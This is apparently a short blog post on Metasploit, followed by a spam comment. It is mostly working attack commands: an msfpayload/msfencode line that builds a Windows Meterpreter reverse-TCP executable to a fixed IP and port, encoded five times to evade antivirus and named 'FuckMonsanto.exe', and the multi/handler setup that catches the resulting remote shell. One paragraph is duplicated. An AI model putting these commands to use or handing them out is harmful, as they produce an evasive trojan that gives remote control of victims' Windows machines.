Now lets take what we learned from the last post and pipe the msfpayload command to msfencode.
~ $ msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=3030 R | msfencode -e x86/shikata_ga_nai -t exe -c 5 -o FuckMonsanto.exe
msf> use exploit/multi/handler
msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(Handler) > set LHOST=19.84.20.11
msf exploit(Handler) > set LPORT=3030
msf exploit(Handler) > exploit -j
Now you can continue with your pentest while the handler runs in the background and waits for connections, at which point you can use the job command to see/interact with the jobs running in the background.
Now you can continue with your pentest while the handler runs in the background and waits for connections, at which point you can use the job command to see/interact with the jobs running in the background.
I am becoming impressive after see your blog, it is beautifully written-ed. free antivirus download
ReplyDelete